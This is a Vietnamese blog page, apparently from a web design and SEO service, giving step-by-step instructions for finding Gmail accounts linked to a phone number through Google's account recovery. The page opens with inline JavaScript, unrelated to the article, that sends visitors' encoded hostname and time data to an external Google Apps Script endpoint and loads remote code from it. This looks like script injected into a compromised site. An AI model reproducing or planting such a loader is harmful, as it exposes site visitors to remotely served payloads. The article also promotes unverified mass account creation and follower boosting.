var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Lưu ngay cách tìm email bằng số điện thoại [Hot Nhất 2023]

Chắc hẳn bạn đã đăng ký khá nhiều Gmail nhưng không nhớ nổi tên đăng nhập là gì, thì cách dưới đây sẽ giúp bạn Tìm tất cả Gmail đã liên kết với số điện thoại hoặc email của bạn. Nếu bạn đã tạo nhiều Gmail và bây giờ bạn không nhớ tên đăng nhập? Trong bài viết này, Simple Page sẽ chỉ bạn cách tìm gmail qua số điện thoại mà bạn đã liên kết trước đó.

Cách tìm gmail liên kết qua số điện thoại hoặc email của bạn

Phải công nhận rằng khi khai báo số điện thoại với Gmail rất tiện lợi. Bạn chỉ cần nhập số điện thoại và cung cấp họ, tên để xem các Gmail của mình. Nếu bạn đã sử dụng số điện thoại cho tất cả các tài khoản Gmail của mình, thì bạn sẽ có thể thấy tất cả các tài khoản Gmail đó.

Ngoài ra, bạn có thể đăng ký nhiều Gmail không cần xác minh theo hướng dẫn của Simple Page

Bước 1: Truy cập vào trang Khôi phục tài khoản. Bạn sẽ thấy giao diện đăng nhập Gmail. Bạn chỉ cần nhập số điện thoại và tên tài khoản Gmail của bạn vào mẫu này.

Bước 2: Sau khi điền vào biểu mẫu , bạn cần nhấp vào Next

Bước 3: Trong cửa sổ tiếp theo, bạn sẽ được yêu cầu điền tên và họ của tài khoản Gmail.

Bước 4: Bạn cần cung cấp chính xác tên và họ để qua bước tiếp theo

Bước 5: Google cần xác minh bạn là chủ số điện thoại đó. Hãy nhấn nút Send để Google gữi mã xác minh cho bạn. Dùng mã xác minh để đăng nhập vào màn hình Google.

Bước 7: Nếu bạn đã cung cấp địa chỉ email, thì mã xác minh sẽ gửi về địa chỉ email của bạn .

Bước 8: Bây giờ Google sẽ liệt kê cho bạn tất cả tài khoản Gmail có trùng khớp với thông tin bạn khai báo.

Bây giờ bạn có thể đăng nhập tài khoản Gmail bằng Password mà bạn nhớ. Nhưng nếu bạn không nhớ mật khẩu Gmail hãy dùng số điện thoại và vào trang quên mật khẩu để lấy lại nhé.

Tổng kết

Đây là cách khá đơn giản để bạn lấy lại các tài khoản Gmail của mình. Sau này khi đăng ký Gmail mới hãy cố gắng khai báo họ và tên cho giống nhau. Bạn có xem lại tất cả Gmail của mình bằng email hoặc số điện thoại đã liên kết.

=> Mọi người cần tư vấn về thiết kế Website, thiết kế Landing Page, Thiết kế hình ảnh, chăm sóc Fanpage, Marketing Online, SEO, Guest Post, làm Tăng Follow FB, Instagram – TikTok – Tăng view like FB thì liên hệ thông tin Admin !

+ ZALO 0336988676 0

+ FACEBOOK: THOẠI NGHIÊM

Có thể bạn quan tâm:

Mẹo tối ưu hình ảnh cho website update mới nhất 2021

7 mẹo thông minh giúp giảm tỷ lệ thoát trang của bạn

Hướng dẫn cách tạo link bio miễn phí với Simple Page

Cách tạo landing page đẹp miễn phí chỉ với 10 bước đơn giản

Nguồn: Tham khảo Thoại Nghiêm: Tổng hợp – edit